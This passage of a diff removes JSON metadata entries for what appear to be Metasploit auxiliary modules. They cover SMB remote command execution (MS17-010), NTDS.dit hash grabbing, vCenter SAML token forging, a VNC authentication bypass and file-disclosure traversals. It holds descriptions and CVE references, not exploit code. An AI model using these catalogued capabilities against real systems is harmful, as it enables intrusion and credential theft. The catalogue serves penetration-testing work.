generated." - }, - { - "name": "CHANGE_NTLM", - "description": "Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." - }, - { - "name": "RESET", - "description": "Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated." - }, - { - "name": "RESET_NTLM", - "description": "Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." - } - ] - }, - "auxiliary_admin/smb/check_dir_file": { - "name": "SMB Scanner Check File/Directory Utility", - "fullname": "auxiliary/admin/smb/check_dir_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack ", - "j0hn__f" - ], - "description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/check_dir_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/delete_file": { - "name": "SMB File Delete Utility", - "fullname": "auxiliary/admin/smb/delete_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix " - ], - "description": "This module deletes a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/delete_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/delete_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/download_file": { - "name": "SMB File Download Utility", - "fullname": "auxiliary/admin/smb/download_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix " - ], - "description": "This module downloads a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/download_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/download_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/list_directory": { - "name": "SMB Directory Listing Utility", - "fullname": "auxiliary/admin/smb/list_directory", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix ", - "hdm " - ], - "description": "This module lists the directory of a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/list_directory.rb", - "is_install_path": true, - "ref_name": "admin/smb/list_directory", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/ms17_010_command": { - "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", - "fullname": "auxiliary/admin/smb/ms17_010_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-14", - "type": "auxiliary", - "author": [ - "sleepya", - "zerosum0x0", - "Shadow Brokers", - "Equation Group" - ], - "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0146", - "CVE-2017-0147", - "URL-https://github.com/worawit/MS17-010", - "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", - "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", - "is_install_path": true, - "ref_name": "admin/smb/ms17_010_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALSYNERGY", - "ETERNALROMANCE", - "ETERNALCHAMPION", - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/psexec_ntdsgrab": { - "name": "PsExec NTDS.dit And SYSTEM Hive Download Utility", - "fullname": "auxiliary/admin/smb/psexec_ntdsgrab", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Royce Davis " - ], - "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.", - "references": [ - "URL-http://sourceforge.net/projects/smbexec", - "URL-https://www.optiv.com/blog/owning-computers-without-shell-access" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", - "is_install_path": true, - "ref_name": "admin/smb/psexec_ntdsgrab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/samba_symlink_traversal": { - "name": "Samba Symlink Directory Traversal", - "fullname": "auxiliary/admin/smb/samba_symlink_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "kcope", - "hdm " - ], - "description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.", - "references": [ - "CVE-2010-0926", - "OSVDB-62145", - "URL-http://www.samba.org/samba/news/symlink_attack.html" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", - "is_install_path": true, - "ref_name": "admin/smb/samba_symlink_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/upload_file": { - "name": "SMB File Upload Utility", - "fullname": "auxiliary/admin/smb/upload_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module uploads a file to a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/upload_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/upload_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/webexec_command": { - "name": "WebEx Remote Command Execution Utility", - "fullname": "auxiliary/admin/smb/webexec_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ron Bowes " - ], - "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2018-10-24 16:18:17 +0000", - "path": "/modules/auxiliary/admin/smb/webexec_command.rb", - "is_install_path": true, - "ref_name": "admin/smb/webexec_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/sunrpc/solaris_kcms_readfile": { - "name": "Solaris KCMS + TTDB Arbitrary File Read", - "fullname": "auxiliary/admin/sunrpc/solaris_kcms_readfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-01-22", - "type": "auxiliary", - "author": [ - "vlad902 ", - "jduck " - ], - "description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server\\'s TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.", - "references": [ - "CVE-2003-0027", - "OSVDB-8201", - "BID-6665", - "URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2" - ], - "platform": "", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-10-05 13:50:30 +0000", - "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", - "is_install_path": true, - "ref_name": "admin/sunrpc/solaris_kcms_readfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/teradata/teradata_odbc_sql": { - "name": "Teradata ODBC SQL Query Module", - "fullname": "auxiliary/admin/teradata/teradata_odbc_sql", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-29", - "type": "auxiliary", - "author": [ - "Ted Raffle (actuated)" - ], - "description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.", - "references": [ - "URL-https://developer.teradata.com/tools/reference/teradata-python-module", - "URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux" - ], - "platform": "", - "arch": "", - "rport": 1025, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-05-17 17:04:49 +0000", - "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", - "is_install_path": true, - "ref_name": "admin/teradata/teradata_odbc_sql", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "Teradata ODBC Authentication Scanner" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/tftp/tftp_transfer_util": { - "name": "TFTP File Transfer Utility", - "fullname": "auxiliary/admin/tftp/tftp_transfer_util", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.", - "references": [ - "URL-http://www.faqs.org/rfcs/rfc1350.html", - "URL-http://www.networksorcery.com/enp/protocol/tftp.htm" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", - "is_install_path": true, - "ref_name": "admin/tftp/tftp_transfer_util", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download REMOTE_FILENAME as FILENAME from the server." - }, - { - "name": "Upload", - "description": "Upload FILENAME as REMOTE_FILENAME to the server." - } - ] - }, - "auxiliary_admin/tikiwiki/tikidblib": { - "name": "TikiWiki Information Disclosure", - "fullname": "auxiliary/admin/tikiwiki/tikidblib", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-11-01", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.", - "references": [ - "OSVDB-30172", - "BID-20858", - "CVE-2006-5702", - "URL-https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", - "is_install_path": true, - "ref_name": "admin/tikiwiki/tikidblib", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump user and password" - } - ] - }, - "auxiliary_admin/upnp/soap_portmapping": { - "name": "UPnP IGD SOAP Port Mapping Utility", - "fullname": "auxiliary/admin/upnp/soap_portmapping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "St0rn ", - "Jon Hart " - ], - "description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests", - "references": [ - "URL-http://www.upnp-hacks.org/igd.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", - "is_install_path": true, - "ref_name": "admin/upnp/soap_portmapping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Use the AddPortMapping SOAP command to open and forward a port" - }, - { - "name": "DELETE", - "description": "Use the DeletePortMapping SOAP command to remove a port forwarding" - } - ] - }, - "auxiliary_admin/vmware/poweroff_vm": { - "name": "VMWare Power Off Virtual Machine", - "fullname": "auxiliary/admin/vmware/poweroff_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/poweroff_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/poweron_vm": { - "name": "VMWare Power On Virtual Machine", - "fullname": "auxiliary/admin/vmware/poweron_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/poweron_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/tag_vm": { - "name": "VMWare Tag Virtual Machine", - "fullname": "auxiliary/admin/vmware/tag_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. It does this by\n logging a user event with user supplied text", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/tag_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/terminate_esx_sessions": { - "name": "VMWare Terminate ESX Login Sessions", - "fullname": "auxiliary/admin/vmware/terminate_esx_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", - "is_install_path": true, - "ref_name": "admin/vmware/terminate_esx_sessions", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/vcenter_forge_saml_token": { - "name": "VMware vCenter Forge SAML Authentication Credentials", - "fullname": "auxiliary/admin/vmware/vcenter_forge_saml_token", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-04-20", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "This module forges valid SAML credentials for vCenter server\n using the vCenter SSO IdP certificate, IdP private key, and\n VMCA certificates as input objects; you must also provide\n the vCenter SSO domain name and vCenter FQDN. The module will\n return a session cookie for the /ui path that grants access to\n the SSO domain as a vSphere administrator. The IdP trusted\n certificate chain can be retrieved using Metasploit post\n exploitation modules or extracted manually from\n /storage/db/vmware-vmdir/data.mdb using binwalk.", - "references": [ - "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" - ], - "platform": "Linux", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb", - "is_install_path": true, - "ref_name": "admin/vmware/vcenter_forge_saml_token", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Run", - "description": "Generate vSphere session cookie" - } - ] - }, - "auxiliary_admin/vmware/vcenter_offline_mdb_extract": { - "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File", - "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-05-10", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "Grab certificates from the vCenter server vmdird and vmafd\n database files and adds them to loot. The vmdird MDB database file\n can be found on the live appliance under the path\n /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n IdP signing credential, and vmafd contains the vCenter certificate\n store. This module will accept either file from a live vCenter\n appliance, or from a vCenter appliance backup archive; either or\n both files can be supplied.", - "references": [ - "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-05-26 11:52:56 +0000", - "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb", - "is_install_path": true, - "ref_name": "admin/vmware/vcenter_offline_mdb_extract", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump secrets from vCenter files" - } - ] - }, - "auxiliary_admin/vnc/realvnc_41_bypass": { - "name": "RealVNC NULL Authentication Mode Bypass", - "fullname": "auxiliary/admin/vnc/realvnc_41_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-05-15", - "type": "auxiliary", - "author": [ - "hdm ", - "theLightCosine " - ], - "description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.", - "references": [ - "BID-17978", - "OSVDB-25479", - "URL-https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/", - "CVE-2006-2369" - ], - "platform": "", - "arch": "", - "rport": 5900, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", - "is_install_path": true, - "ref_name": "admin/vnc/realvnc_41_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/apple_airport_extreme_password": { - "name": "Apple Airport Extreme Password Extraction (WDBRPC)", - "fullname": "auxiliary/admin/vxworks/apple_airport_extreme_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/apple_airport_extreme_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/dlink_i2eye_autoanswer": { - "name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)", - "fullname": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/dlink_i2eye_autoanswer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/wdbrpc_memory_dump": { - "name": "VxWorks WDB Agent Remote Memory Dump", - "fullname": "auxiliary/admin/vxworks/wdbrpc_memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/wdbrpc_memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Dump system memory" - } - ] - }, - "auxiliary_admin/vxworks/wdbrpc_reboot": { - "name": "VxWorks WDB Agent Remote Reboot", - "fullname": "auxiliary/admin/vxworks/wdbrpc_reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module provides the ability to reboot a VxWorks target through WDBRPC", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/wdbrpc_reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Reboot", - "description": "Reboot target" - } - ] - }, - "auxiliary_admin/webmin/edit_html_fileaccess": { - "name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access", - "fullname": "auxiliary/admin/webmin/edit_html_fileaccess", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-09-06", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.", - "references": [ - "OSVDB-85247", - "BID-55446", - "CVE-2012-2983", - "URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf", - "URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", - "is_install_path": true, - "ref_name": "admin/webmin/edit_html_fileaccess", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/webmin/file_disclosure": { - "name": "Webmin File Disclosure", - "fullname": "auxiliary/admin/webmin/file_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-06-30", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).", - "references": [ - 